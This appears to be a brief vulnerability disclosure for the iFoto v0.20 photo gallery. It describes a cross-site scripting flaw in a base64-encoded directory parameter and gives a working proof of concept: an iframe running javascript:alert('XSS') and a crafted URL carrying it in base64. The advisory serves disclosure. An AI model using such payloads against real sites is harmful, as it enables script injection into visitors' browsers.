iFoto v0.20-06/06/06 Homepage: http://ifoto.ireans.com/ Effected files: XSS Vulnerability: The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64. The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME] http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+